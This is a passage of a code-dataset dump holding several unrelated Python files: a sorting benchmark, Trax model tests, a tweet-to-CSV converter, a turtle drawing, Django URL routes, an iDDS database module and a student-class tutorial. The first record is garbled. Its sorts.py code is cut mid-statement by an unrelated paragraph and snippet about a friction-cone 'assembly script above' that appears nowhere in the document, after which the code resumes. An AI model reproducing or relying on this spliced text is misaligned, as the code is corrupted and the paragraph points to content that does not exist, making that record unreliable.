index\r\n        while position > 0 and alist[position - 1] > currentvalue:\r\n            alist[position] = alist[position-1]\r\n            position = position - 1\r\n            count += 1 \r\n        alist[position] = currentvalue \r\n    return count \r\n\r\n\r\ndef main():\r\n    # Give the random number generator a seed, so the same sequence of \r\n    # random numbers is generated at each run\r\n    #random.seed(1234) \r\n    \r\n    # Generate 32000 random numbers from 0 to 999,999\r\n    randoms = random.sample(range(1000000), 32000)\r\n    start_time = time.time() \r\n    comps = insertion_sort(randoms)\r\n    stop_time = time.time()\r\n    print(comps, stop_time - start_time)\r\n\r\nif __name__ == '__main__': \r\n    
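The friction-cone construction in the assembly script above spans each contact with two edge forces at theta plus/minus atan(mu) and uses the scalar 2-D cross product r x F as the moment about the origin. A standalone check for one contact:

    import math

    mu, theta = 0.5, math.pi / 2            # vertical contact normal, friction coefficient 0.5
    alpha = math.atan(mu)
    r = (1.0, 0.0)                          # contact point
    for t in (theta + alpha, theta - alpha):
        fx, fy = math.cos(t), math.sin(t)   # unit force along one cone edge
        moment = r[0] * fy - r[1] * fx      # z-component of r x F
        print('edge (%.3f, %.3f), moment %.3f' % (fx, fy, moment))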
main()\r\n\r\n","sub_path":"sorts.py","file_name":"sorts.py","file_ext":"py","file_size_in_byte":1339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"349108393","text":"# coding=utf-8\n# Copyright 2021 The Trax Authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n# Lint as: python3\n\"\"\"Tests for Funnel-Transformer models.\"\"\"\n\nfrom absl.testing import absltest\nfrom absl.testing import parameterized\nimport gin\nimport jax\nimport numpy as np\nfrom trax import fastmath\nfrom trax import layers as tl\nfrom trax import shapes\nimport trax.models.research.funnel_transformer as ft\nfrom trax.supervised import decoding\n\n\n# pylint: disable=g-unreachable-test-method\n\n\nclass FunnelTransformerTest(parameterized.TestCase):\n\n def test_mean_pool(self):\n x = np.ones((1, 4, 1))\n x[0, :3, 0] = [5., 2., 4.]\n\n pooling = ft.PoolLayer(tl.AvgPool, (2,), (2,))\n y = pooling(x)\n\n self.assertEqual(y.shape, (1, 2, 1))\n self.assertEqual(y.tolist(), [[[5.], [3.]]])\n\n def test_mask_pool(self):\n x = np.array([1, 0, 0, 1], dtype=bool).reshape((1, 1, 1, 4))\n pooling_cls = ft.MaskPool((2,), (2,))\n y1 = pooling_cls(x)\n\n self.assertEqual(y1.shape, (1, 1, 1, 2))\n self.assertEqual(y1.squeeze().tolist(), [True, False])\n\n pooling_without_cls = ft.MaskPool((2,), (2,), separate_cls=False)\n y2 = pooling_without_cls(x)\n\n self.assertEqual(y2.shape, (1, 1, 1, 2))\n self.assertEqual(y2.squeeze().tolist(), [True, True])\n\n def test_upsampler(self):\n long = np.ones((1, 8, 1))\n short = np.ones((1, 2, 1))\n total_pool_size = long.shape[1] // short.shape[1]\n up_cls = ft._Upsampler(total_pool_size, separate_cls=True)\n up = ft._Upsampler(total_pool_size, separate_cls=False)\n\n y_cls = up_cls([short, long])\n y = up((short, long))\n self.assertEqual(y_cls.shape, long.shape)\n self.assertEqual(y.shape, long.shape)\n\n self.assertEqual(y_cls.squeeze().tolist(), 5*[2] + 3*[1])\n self.assertEqual(y.squeeze().tolist(), 8*[2])\n\n def test_funnel_block_forward_shape(self):\n n_even = 4\n d_model = 8\n\n x = np.ones((1, n_even, d_model), dtype=np.float)\n mask = np.ones((1, n_even), dtype=np.int32)\n\n masker = tl.PaddingMask()\n mask = masker(mask)\n\n block = tl.Serial(\n ft._FunnelBlock(d_model, 8, 2, 0.1, None, 'train', tl.Relu,\n tl.AvgPool, (2,), (2,), separate_cls=True))\n\n xs = [x, mask]\n _, _ = block.init(shapes.signature(xs))\n\n y, _ = block(xs)\n\n self.assertEqual(y.shape, (1, n_even // 2, d_model))\n\n def test_funnel_transformer_encoder_forward_shape(self):\n n_classes = 5\n model = ft.FunnelTransformerEncoder(2, n_classes=n_classes, d_model=8,\n d_ff=8, encoder_segment_lengths=(1, 1),\n n_heads=2, max_len=8)\n\n batch_size = 2\n n_tokens = 4\n x = np.ones((batch_size, n_tokens), dtype=np.int32)\n _ = model.init(shapes.signature(x))\n y = model(x)\n\n self.assertEqual(y.shape, (batch_size, n_classes))\n\n def test_funnel_transformer_forward_shape(self):\n d_model = 8\n vocab_size = 7\n model = ft.FunnelTransformer(7, 
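Both sorts above are quadratic, so doubling the input size should roughly quadruple the reported comparison count. A quick empirical check using the insertion_sort from the sample (the ratio is approximate, since it depends on the random input):

    import random

    random.seed(1)
    small = insertion_sort(random.sample(range(10**6), 4000))
    large = insertion_sort(random.sample(range(10**6), 8000))
    print(large / small)  # expect a value near 4 for an O(n^2) sort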
d_model=d_model, d_ff=8,\n encoder_segment_lengths=(1, 1),\n n_decoder_blocks=1, n_heads=2, max_len=8)\n\n batch_size = 2\n n_tokens = 4\n x = np.ones((batch_size, n_tokens), dtype=np.int32)\n _ = model.init(shapes.signature(x))\n y = model(x)\n\n self.assertEqual(y.shape, (batch_size, n_tokens, vocab_size))\n\n def _check_forward_shape(self, model, input_shape, output_vocab_size):\n x = np.ones(input_shape).astype(np.int32)\n model.init(shapes.signature(x))\n y = model(x)\n self.assertEqual(y.shape, (*input_shape, output_vocab_size))\n\n def test_funnel_transformer_lm_forward_shape(self):\n d_model = 16\n vocab_size = 7\n model = ft.RelformerLM(\n vocab_size,\n shorten_factors=(3,),\n n_funnel_blocks=(2,),\n vanilla_layers=(1, 1),\n d_model=d_model,\n d_ff=d_model,\n n_heads=2,\n )\n\n batch_size, seq_len = 3, 12\n self._check_forward_shape(\n model, input_shape=(batch_size, seq_len), output_vocab_size=vocab_size)\n\n def test_lsh_attention_in_vanilla(self):\n d_model = 16\n vocab_size = 7\n\n gin.bind_parameter('PureLSHSelfAttentionWrapper.pure_lsh_implementation',\n tl.PureLSHSelfAttention)\n gin.bind_parameter('PureLSHSelfAttention.chunk_len', 2)\n\n model = ft.RelformerLM(\n vocab_size,\n shorten_factors=(3,),\n n_funnel_blocks=(2,),\n vanilla_layers=(1, 1),\n d_model=d_model,\n d_ff=d_model,\n n_heads=2,\n vanilla_attn_type=tl.PureLSHSelfAttentionWrapper,\n downsampling_fn=ft.LinearPooling,\n upsampling_fn=ft.LinearUpsampling,\n )\n\n batch_size, seq_len = 3, 12\n self._check_forward_shape(\n model, input_shape=(batch_size, seq_len), output_vocab_size=vocab_size)\n\n def _test_autoregressive_property(self, model, input_shape,\n output_vocab_size):\n rng_1 = jax.random.PRNGKey(0)\n rng_2 = jax.random.PRNGKey(1)\n\n def _get_output_logits(unitialized_eval_model: tl.Layer, x):\n input_signature = shapes.signature(x)\n unitialized_eval_model.init(input_signature, rng=rng_1, use_cache=False)\n\n output_logits, *_ = unitialized_eval_model(x, rng=rng_1)\n return output_logits\n\n def check_autoregressive_property(model):\n with fastmath.use_backend(fastmath.Backend.JAX):\n x_1 = jax.random.randint(rng_1, input_shape, 0, output_vocab_size)\n y_1 = _get_output_logits(model, x_1)\n\n x_2 = jax.random.randint(rng_2, input_shape, 0, output_vocab_size)\n\n for i in range(input_shape[1]):\n masked_x_2 = np.concatenate((x_1[:, :i], x_2[:, i:]), axis=1)\n\n y_2 = _get_output_logits(model, masked_x_2)\n self.assertEqual(y_2.shape[0], input_shape[1])\n np.testing.assert_array_almost_equal(y_1[:i + 1], y_2[:i + 1])\n\n check_autoregressive_property(model)\n\n def test_funnel_transformer_lm_autoregressive_property(self):\n d_model = 8\n vocab_size = 26\n\n model = ft.RelformerLM(\n vocab_size,\n shorten_factors=(3,),\n n_funnel_blocks=(2,),\n vanilla_layers=(1, 1),\n d_model=d_model,\n d_ff=d_model,\n n_heads=2,\n )\n\n input_shape = (1, 12)\n self._test_autoregressive_property(\n model, input_shape, output_vocab_size=vocab_size)\n\n def test_autoregressive_property_vanilla(self):\n d_model = 8\n vocab_size = 26\n\n gin.bind_parameter('trax.layers.SelfAttention.chunk_len', 2)\n model = ft.RelformerLM(\n vocab_size,\n shorten_factors=(3,),\n n_funnel_blocks=(2,),\n vanilla_layers=(1, 1),\n d_model=d_model,\n d_ff=d_model,\n n_heads=2,\n vanilla_attn_type=tl.SelfAttention,\n downsampling_fn=ft.LinearPooling,\n upsampling_fn=ft.LinearUpsampling,\n )\n input_shape = (1, 12)\n self._test_autoregressive_property(\n model, input_shape, output_vocab_size=vocab_size)\n\n def 
_test_funnel_transformer_lm_forward_shape_predict(self):\n d_model = 8\n vocab_size = 4\n batch_size = 1\n n_len_eval = 42\n attention_type = tl.SelfAttention\n\n shorten_factor = 3\n n_rel_layers = 2\n vanilla_layers = (1, 1)\n n_heads = 2\n\n rel_chunk_len, vanilla_chunk_len = 2, 6\n\n x = np.ones((batch_size, 1)).astype(np.int32)\n gin.bind_parameter('trax.layers.SelfAttention.chunk_len', 20)\n\n predict_funnel = ft.RelformerChunkedLM(\n vocab_size,\n shorten_factor=shorten_factor,\n n_rel_layers=n_rel_layers,\n vanilla_layers=vanilla_layers,\n d_model=d_model,\n d_ff=d_model,\n n_heads=n_heads,\n vanilla_attn_type=attention_type,\n rel_chunk_len=rel_chunk_len,\n vanilla_chunk_len=vanilla_chunk_len,\n max_len=n_len_eval,\n mode='predict')\n\n _, _ = predict_funnel.init(shapes.signature(x))\n\n for _ in range(5):\n y = predict_funnel(x)\n self.assertEqual(y.shape, (batch_size, 1, vocab_size))\n gin.clear_config()\n\n def _test_funnel_transformer_lm_predict_eval_equal(self):\n\n def _test_for_chunk_lens(rel_chunk_len, vanilla_chunk_len):\n d_model = 8\n vocab_size = 4\n batch_size = 1\n n_len_eval = 42\n attention_type = tl.SelfAttention\n\n shorten_factor = 3\n n_rel_layers = 2\n vanilla_layers = (1, 1)\n n_heads = 2\n\n eval_funnel = ft.RelformerChunkedLM(\n vocab_size,\n shorten_factor=shorten_factor,\n n_rel_layers=n_rel_layers,\n vanilla_layers=vanilla_layers,\n d_model=d_model,\n d_ff=d_model,\n n_heads=n_heads,\n vanilla_attn_type=attention_type,\n rel_chunk_len=rel_chunk_len,\n vanilla_chunk_len=vanilla_chunk_len,\n mode='eval')\n\n inputs = jax.random.randint(\n key=jax.random.PRNGKey(0),\n minval=0,\n maxval=vocab_size,\n shape=(batch_size, n_len_eval)).astype(np.int32)\n _, _ = eval_funnel.init(\n shapes.signature(inputs), rng=jax.random.PRNGKey(0))\n y_eval = eval_funnel(inputs)\n self.assertEqual(y_eval.shape, (batch_size, n_len_eval, vocab_size))\n\n if attention_type == tl.SelfAttention:\n gin.bind_parameter('trax.layers.SelfAttention.chunk_len', n_len_eval)\n\n predict_funnel = ft.RelformerChunkedLM(\n vocab_size,\n shorten_factor=shorten_factor,\n n_rel_layers=n_rel_layers,\n vanilla_layers=vanilla_layers,\n d_model=d_model,\n d_ff=d_model,\n n_heads=n_heads,\n vanilla_attn_type=attention_type,\n rel_chunk_len=rel_chunk_len,\n vanilla_chunk_len=vanilla_chunk_len,\n mode='predict')\n\n inputs = np.concatenate(\n [np.zeros((batch_size, 1)).astype(np.int32), inputs], axis=1)\n inputs = inputs[:, :-1]\n\n _, _ = predict_funnel.init(\n shapes.signature(inputs[:, 0:1]),\n rng=jax.random.PRNGKey(0),\n use_cache=False)\n\n for i in range(n_len_eval):\n y = predict_funnel(inputs[:, i:i + 1])\n np.testing.assert_array_almost_equal(\n y, y_eval[:, i:i + 1, :], decimal=5)\n\n _test_for_chunk_lens(rel_chunk_len=None, vanilla_chunk_len=None)\n _test_for_chunk_lens(rel_chunk_len=2, vanilla_chunk_len=6)\n\n def _test_autoregressive_sample_relformerlm(self):\n batch_size = 4\n max_length = 5\n model = ft.RelformerChunkedLM(\n 10,\n d_model=8,\n d_ff=16,\n n_rel_layers=1,\n vanilla_layers=(1, 1),\n shorten_factor=3,\n n_heads=2,\n mode='predict')\n model.init(shapes.ShapeDtype((batch_size, 1), dtype=np.int32))\n s1 = decoding.autoregressive_sample(\n model,\n batch_size=batch_size,\n eos_id=-1,\n max_length=max_length,\n accelerate=False)\n self.assertEqual(s1.shape, (batch_size, max_length))\n\n\nif __name__ == '__main__':\n 
absltest.main()\n","sub_path":"trax/models/research/funnel_transformer_test.py","file_name":"funnel_transformer_test.py","file_ext":"py","file_size_in_byte":11404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"113737999","text":"import csv\nfrom os import listdir\nfrom os.path import isfile, join\nfrom hoover.simple import read_simple\n\n\nFIELDS_TWEET = ('created_at',\n 'timestamp',\n 'id',\n 'text',\n 'retweet_count',\n 'favorite_count',\n 'lang')\n\n\nFIELDS_USER = ('user_id', 'user_screen_name')\n\n\nFIELDS_ALL = ('reply', 'retweet', 'quote')\n\n\nFIELDS_REPLY = ('in_reply_to_status_id',\n 'in_reply_to_user_id',\n 'in_reply_to_screen_name')\n\n\nFIELDS_PARENT_TWEET = ('quoted_text',)\n\n\nFIELDS_RETWEET = ('retweeted_id',\n 'retweeted_user_id',\n 'retweeted_user_screen_name')\n\n\nFIELDS_QUOTE = ('quoted_id',\n 'quoted_user_id',\n 'quoted_user_screen_name')\n\n\ndef _matches_filter(csv_type, tweet):\n if csv_type in {'all', 'hashtags', 'mentions'}:\n return True\n elif csv_type == 'tweets':\n return ((not tweet['reply']) and\n (not tweet['retweet']) and\n (not tweet['quote']))\n elif csv_type == 'replies':\n return tweet['reply']\n elif csv_type == 'retweets':\n return tweet['retweet']\n elif csv_type == 'quotes':\n return tweet['quote']\n raise RuntimeError('Unknown csv type: {}.'.format(csv_type))\n\n\ndef tweets_to_csv(tweets, outfile, csv_type='all', user_data=True):\n base_fields = FIELDS_TWEET\n if user_data:\n base_fields += FIELDS_USER\n\n if csv_type == 'all':\n fields = (base_fields + FIELDS_PARENT_TWEET + FIELDS_ALL +\n FIELDS_REPLY + FIELDS_RETWEET + FIELDS_QUOTE)\n elif csv_type == 'tweets':\n fields = base_fields\n elif csv_type == 'replies':\n fields = base_fields + FIELDS_REPLY\n elif csv_type == 'retweets':\n fields = base_fields + FIELDS_PARENT_TWEET + FIELDS_RETWEET\n elif csv_type == 'quotes':\n fields = base_fields + FIELDS_PARENT_TWEET + FIELDS_QUOTE\n else:\n raise RuntimeError('Unknown csv type: {}'.format(csv_type))\n\n if user_data:\n fields += FIELDS_USER\n\n with open(outfile, 'w') as outfile:\n csvwriter = csv.writer(outfile)\n csvwriter.writerow(fields)\n for tweet in tweets:\n csvwriter.writerow([tweet[field] for field in fields])\n\n return 1\n\n\ndef hashtags(tweets, outfile, user_data):\n counts = {}\n for tweet in tweets:\n user = tweet['user_screen_name']\n if user not in counts:\n counts[user] = {}\n for occurrence in tweet['hashtags']:\n if occurrence not in counts[user]:\n counts[user][occurrence] = 0\n counts[user][occurrence] += 1\n\n if len(counts) == 0:\n return 0\n\n fields = ('hashtag', 'occurrences')\n if user_data:\n fields = ('user',) + fields\n\n with open(outfile, 'w') as outfile:\n csvwriter = csv.writer(outfile)\n csvwriter.writerow(fields)\n\n for user in counts:\n for occurrence in counts[user]:\n row = {'user': user,\n 'hashtag': occurrence,\n 'occurrences': counts[user][occurrence]}\n csvwriter.writerow([row[field] for field in fields])\n\n return 1\n\n\ndef mentions(tweets, outfile, user_data):\n counts = {}\n for tweet in tweets:\n user = tweet['user_screen_name']\n if user not in counts:\n counts[user] = {}\n for occurrence in tweet['mentions']:\n if occurrence not in counts[user]:\n counts[user][occurrence] = 0\n counts[user][occurrence] += 1\n\n if len(counts) == 0:\n return 0\n\n fields = ('mentioned_id', 'mentioned_screen_name', 'occurrences')\n if user_data:\n fields = ('user',) + fields\n\n with open(outfile, 'w') as outfile:\n csvwriter = csv.writer(outfile)\n 
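The tests above repeat one trax idiom: build an input, derive its signature, init the layer from it, then call the layer. A minimal standalone instance of that pattern with a stock layer:

    import numpy as np
    from trax import layers as tl
    from trax import shapes

    layer = tl.Relu()
    x = np.array([[-1.0, 2.0]])
    layer.init(shapes.signature(x))  # weights and state are sized from the signature
    print(layer(x))                  # [[0. 2.]]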
csvwriter.writerow(fields)\n\n for user in counts:\n for occurrence in counts[user]:\n row = {'user': user,\n 'mentioned_id': occurrence[0],\n 'mentioned_screen_name': occurrence[1],\n 'occurrences': counts[user][occurrence]}\n csvwriter.writerow([row[field] for field in fields])\n\n return 1\n\n\ndef json_file_to_csv(infile, outfile, csv_type='all', user_data=True):\n tweets = tuple(tweet for tweet in read_simple(infile)\n if _matches_filter(csv_type, tweet))\n if len(tweets) == 0:\n return 0\n\n if csv_type == 'hashtags':\n return hashtags(tweets, outfile, user_data)\n elif csv_type == 'mentions':\n return mentions(tweets, outfile, user_data)\n else:\n return tweets_to_csv(tweets, outfile, csv_type, user_data)\n\n\ndef dir_to_csvs(indir, outdir, csv_type='all'):\n files = [f for f in listdir(indir) if isfile(join(indir, f))]\n n = 0\n for file in files:\n if file[-5:] == '.json':\n infile = join(indir, file)\n outfile = '{}-{}.csv'.format(file[:-5], csv_type)\n outfile = join(outdir, outfile)\n n += json_file_to_csv(\n infile, outfile, csv_type, user_data=False)\n return n\n\n\ndef to_csv(infile, outfile, indir, outdir, csv_type):\n if csv_type:\n filters = {csv_type}\n else:\n filters = ('all', 'tweets',\n 'replies', 'retweets', 'quotes',\n 'hashtags', 'mentions')\n\n print('Using filters: {}.'.format(', '.join(filters)))\n\n n = 0\n if indir:\n if infile:\n raise RuntimeError(\n 'Only one of --infile or --indir should be provided.')\n if outfile:\n raise RuntimeError(\n 'Only one of --outfile or --indir should be provided.')\n if not outdir:\n raise RuntimeError('--outdir must be provided.')\n for filt in filters:\n print('Converting to csv type: {}'.format(filt))\n n += dir_to_csvs(indir, outdir, filt)\n elif infile:\n if indir:\n raise RuntimeError(\n 'Only one of --infile or --indir should be provided.')\n if outdir:\n raise RuntimeError(\n 'Only one of --infile or --outdir should be provided.')\n if not outfile:\n raise RuntimeError('--outfile must be provided.')\n for filt in filters:\n print('Converting to csv type: {}'.format(filt))\n n += json_file_to_csv(infile, outfile, filt)\n else:\n raise RuntimeError('Either --infile or --indir must be provided.')\n\n print('{} csv files created.'.format(str(n)))\n","sub_path":"hoover/csv.py","file_name":"csv.py","file_ext":"py","file_size_in_byte":6595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"132433869","text":"import turtle\nt=turtle.Pen()\nt.pensize(2)\nt.begin_fill()\nt.color ('purple')\nfor i in range(360):\n t.forward(1)\n t.right(1)\nt.end_fill()\nt.hideturtle()\nturtle.mainloop()\n\n","sub_path":"trtl2.py","file_name":"trtl2.py","file_ext":"py","file_size_in_byte":176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"485687237","text":"import os\nimport numpy\n\nif __name__ == '__main__':\n loadpath = 'E:/ProjectData_LIDC/EnsembleResult/SameData(Times=40)-Result/'\n partname = 'All_%s.csv'\n\n for part in ['AdaBoost', 'Gaussian', 'SVC', 'Tree']:\n if not os.path.exists(os.path.join(loadpath, partname % part)):\n print()\n continue\n data = numpy.genfromtxt(fname=os.path.join(loadpath, partname % part), dtype=float, delimiter=',')\n assembly = numpy.sum(data, axis=1)\n for index in range(1, 5):\n print(data[numpy.argmax(assembly)][index], end='\\t')\n 
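A sketch of invoking the converter above on a single file; the file names are placeholders, and each tweet object in the input JSON must carry the fields this module reads:

    n = json_file_to_csv('tweets.json', 'tweets-mentions.csv', csv_type='mentions')
    print('%d csv file(s) created' % n)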
print()\n","sub_path":"LIDC_201905/BestChoose.py","file_name":"BestChoose.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}{"seq_id":"226381545","text":"from django.urls import path\nfrom catalog.views import (\n    gallery_detail_page,\n    prestige\n)\nfrom . import views\nfrom django.conf.urls import url\n\n\n\nurlpatterns = [\n    path('', views.index, name='index'),\n    url(r'^weapons/$', views.BookListView.as_view(), name='weapons'),\n    url(r'^weapon/(?P<pk>\d+)$', views.BookDetailView.as_view(), name='book-detail'),\n    url(r'^authors/$', views.AuthorListView.as_view(), name='authors'),\n    url(r'^author/(?P<pk>\d+)$', views.AuthorDetailView.as_view(), name='author-detail'),\n    url(r'^testing/$', views.testing, name='testing'),\n    url(r'^rifles/$', views.RifleListView.as_view(), name = 'rifles'),\n    url(r'^rifle/(?P<pk>\d+)$', views.RifleDetailView.as_view(), name='rifles-detail'),\n    url('gallery/', gallery_detail_page, name = 'gallery'),\n    url('allweapons', views.weapons, name='allweapons'),\n    url('prestige/', prestige, name = 'prestige'),\n    ]\n","sub_path":"catalog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}{"seq_id":"51805115","text":"#!/usr/bin/env python\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# You may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n# http://www.apache.org/licenses/LICENSE-2.0OA\n#\n# Authors:\n# - Wen Guan, 2019 - 2020\n\n\n\"\"\"\noperations related to Processings.\n\"\"\"\n\nimport datetime\n\nimport sqlalchemy\nfrom sqlalchemy.exc import DatabaseError, IntegrityError\nfrom sqlalchemy.sql.expression import asc\n\nfrom idds.common import exceptions\nfrom idds.common.constants import ProcessingStatus, ProcessingLocking, GranularityType\nfrom idds.orm.base.session import read_session, transactional_session\nfrom idds.orm.base import models\n\n\ndef create_processing(transform_id, status=ProcessingStatus.New, locking=ProcessingLocking.Idle, submitter=None,\n                      granularity=None, granularity_type=GranularityType.File, expired_at=None, processing_metadata=None,\n                      substatus=ProcessingStatus.New, output_metadata=None):\n    \"\"\"\n    Create a processing.\n\n    :param transform_id: Transform id.\n    :param status: processing status.\n    :param locking: processing locking.\n    :param submitter: submitter name.\n    :param granularity: Granularity size.\n    :param granularity_type: Granularity type.\n    :param expired_at: The datetime when it expires.\n    :param processing_metadata: The metadata as json.\n\n    :returns: processing.\n    \"\"\"\n    new_processing = models.Processing(transform_id=transform_id, status=status, substatus=substatus, locking=locking,\n                                       submitter=submitter, granularity=granularity, granularity_type=granularity_type,\n                                       expired_at=expired_at, processing_metadata=processing_metadata,\n                                       output_metadata=output_metadata)\n    return new_processing\n\n\n@transactional_session\ndef add_processing(transform_id, status=ProcessingStatus.New, locking=ProcessingLocking.Idle, submitter=None,\n                   granularity=None, granularity_type=GranularityType.File, expired_at=None, processing_metadata=None,\n                   output_metadata=None, session=None):\n    \"\"\"\n    Add a processing.\n\n    :param transform_id: Transform id.\n    :param status: processing status.\n    :param locking: processing locking.\n    :param submitter: submitter name.\n    :param 
granularity: Granularity size.\n    :param granularity_type: Granularity type.\n    :param expired_at: The datetime when it expires.\n    :param processing_metadata: The metadata as json.\n\n    :raises DuplicatedObject: If a processing with the same name exists.\n    :raises DatabaseException: If there is a database error.\n\n    :returns: processing id.\n    \"\"\"\n    try:\n        new_processing = create_processing(transform_id=transform_id, status=status, locking=locking, submitter=submitter,\n                                           granularity=granularity, granularity_type=granularity_type, expired_at=expired_at,\n                                           processing_metadata=processing_metadata, output_metadata=output_metadata)\n        new_processing.save(session=session)\n        proc_id = new_processing.processing_id\n        return proc_id\n    except IntegrityError as error:\n        raise exceptions.DuplicatedObject('Processing already exists!: %s' % (error))\n    except DatabaseError as error:\n        raise exceptions.DatabaseException(error)\n\n\n@read_session\ndef get_processing(processing_id, to_json=False, session=None):\n    \"\"\"\n    Get processing or raise a NoObject exception.\n\n    :param processing_id: Processing id.\n    :param to_json: return json format.\n\n    :param session: The database session in use.\n\n    :raises NoObject: If no processing is found.\n\n    :returns: Processing.\n    \"\"\"\n\n    try:\n        query = session.query(models.Processing)\\\n                       .filter_by(processing_id=processing_id)\n        ret = query.first()\n        if not ret:\n            return None\n        else:\n            if to_json:\n                return ret.to_dict_json()\n            else:\n                return ret.to_dict()\n    except sqlalchemy.orm.exc.NoResultFound as error:\n        raise exceptions.NoObject('Processing(processing_id: %s) cannot be found: %s' %\n                                  (processing_id, error))\n    except Exception as error:\n        raise error\n\n\n@read_session\ndef get_processings_by_transform_id(transform_id=None, to_json=False, session=None):\n    \"\"\"\n    Get processings or raise a NoObject exception.\n\n    :param transform_id: Transform id.\n    :param session: The database session in use.\n\n    :raises NoObject: If no processing is found.\n\n    :returns: Processings.\n    \"\"\"\n\n    try:\n        query = session.query(models.Processing)\\\n                       .filter_by(transform_id=transform_id)\n        query = query.order_by(asc(models.Processing.processing_id))\n\n        ret = query.all()\n        if not ret:\n            return []\n        else:\n            items = []\n            for t in ret:\n                if to_json:\n                    items.append(t.to_dict_json())\n                else:\n                    items.append(t.to_dict())\n            return items\n    except sqlalchemy.orm.exc.NoResultFound as error:\n        raise exceptions.NoObject('Processings(transform_id: %s) cannot be found: %s' %\n                                  (transform_id, error))\n    except Exception as error:\n        raise error\n\n\n@read_session\ndef get_processings_by_status(status, period=None, locking=False, bulk_size=None, submitter=None, to_json=False, session=None):\n    \"\"\"\n    Get processing or raise a NoObject exception.\n\n    :param status: Processing status or list of processing statuses.\n    :param period: Time period in seconds.\n    :param locking: Whether to retrieve only unlocked items.\n    :param bulk_size: bulk size limitation.\n    :param submitter: The submitter name.\n    :param to_json: return json format.\n\n    :param session: The database session in use.\n\n    :raises NoObject: If no processing is found.\n\n    :returns: Processings.\n    \"\"\"\n\n    try:\n        if not isinstance(status, (list, tuple)):\n            status = [status]\n        if len(status) == 1:\n            status = [status[0], status[0]]\n\n        query = session.query(models.Processing)\\\n                       .filter(models.Processing.status.in_(status))\\\n                       .filter(models.Processing.next_poll_at < datetime.datetime.utcnow())\n\n        if period:\n            query = 
query.filter(models.Processing.updated_at < datetime.datetime.utcnow() - datetime.timedelta(seconds=period))\n if locking:\n query = query.filter(models.Processing.locking == ProcessingLocking.Idle)\n if submitter:\n query = query.filter(models.Processing.submitter == submitter)\n\n query = query.order_by(asc(models.Processing.updated_at))\n\n if bulk_size:\n query = query.limit(bulk_size)\n\n tmp = query.all()\n rets = []\n if tmp:\n for t in tmp:\n if to_json:\n rets.append(t.to_dict_json())\n else:\n rets.append(t.to_dict())\n return rets\n except sqlalchemy.orm.exc.NoResultFound as error:\n raise exceptions.NoObject('No processing attached with status (%s): %s' % (status, error))\n except Exception as error:\n raise error\n\n\n@transactional_session\ndef update_processing(processing_id, parameters, session=None):\n \"\"\"\n update a processing.\n\n :param processing_id: the transform id.\n :param parameters: A dictionary of parameters.\n :param session: The database session in use.\n\n :raises NoObject: If no content is founded.\n :raises DatabaseException: If there is a database error.\n\n \"\"\"\n try:\n\n parameters['updated_at'] = datetime.datetime.utcnow()\n if 'status' in parameters and parameters['status'] in [ProcessingStatus.Finished, ProcessingStatus.Failed,\n ProcessingStatus.Lost]:\n parameters['finished_at'] = datetime.datetime.utcnow()\n\n session.query(models.Processing).filter_by(processing_id=processing_id)\\\n .update(parameters, synchronize_session=False)\n except sqlalchemy.orm.exc.NoResultFound as error:\n raise exceptions.NoObject('Processing %s cannot be found: %s' % (processing_id, error))\n\n\n@transactional_session\ndef delete_processing(processing_id=None, session=None):\n \"\"\"\n delete a processing.\n\n :param processing_id: The id of the processing.\n :param session: The database session in use.\n\n :raises NoObject: If no processing is founded.\n :raises DatabaseException: If there is a database error.\n \"\"\"\n try:\n session.query(models.Processing).filter_by(processing_id=processing_id).delete()\n except sqlalchemy.orm.exc.NoResultFound as error:\n raise exceptions.NoObject('Processing %s cannot be found: %s' % (processing_id, error))\n\n\n@transactional_session\ndef clean_locking(time_period=3600, session=None):\n \"\"\"\n Clearn locking which is older than time period.\n\n :param time_period in seconds\n \"\"\"\n params = {'locking': 0}\n session.query(models.Processing).filter(models.Processing.locking == ProcessingLocking.Locking)\\\n .filter(models.Processing.updated_at < datetime.datetime.utcnow() - datetime.timedelta(seconds=time_period))\\\n .update(params, synchronize_session=False)\n\n\n@transactional_session\ndef clean_next_poll_at(status, session=None):\n \"\"\"\n Clearn next_poll_at.\n\n :param status: status of the processing\n \"\"\"\n if not isinstance(status, (list, tuple)):\n status = [status]\n if len(status) == 1:\n status = [status[0], status[0]]\n\n params = {'next_poll_at': datetime.datetime.utcnow()}\n session.query(models.Processing).filter(models.Processing.status.in_(status))\\\n .update(params, synchronize_session=False)\n","sub_path":"main/lib/idds/orm/processings.py","file_name":"processings.py","file_ext":"py","file_size_in_byte":10000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"35023503","text":"# help make your programs more organized and powerful\n# we work with a lot of different kinds of data and data structures\n# but not all data can be represented with 
strings, numbers, or booleans (like a person, phone, or computer)\n# with classes and objects, we can create our own data types with classes (overview/template of the data type)!\n\n# to create a class, we need to create another file\n# then we do class (class name): [indent] attributes\n#class Student:\n # we use this initialize function to map out student attributes\n# def __init__(self, name, major, gpa, is_on_probation):\n # now we assign some values\n# self.name = name\n# self.major = major\n# self.gpa = gpa\n# self.is_on_probation = is_on_probation\n\n# now we can call on the student.py class we created to make a student (object)\n# we first need to import the Student class from the other file\n\nfrom student import Student\n\nstudent1 = Student(\"Jim\", \"Business Administration\", 3.1, False)\nstudent2 = Student(\"Pam\", \"Art\", 2.5, 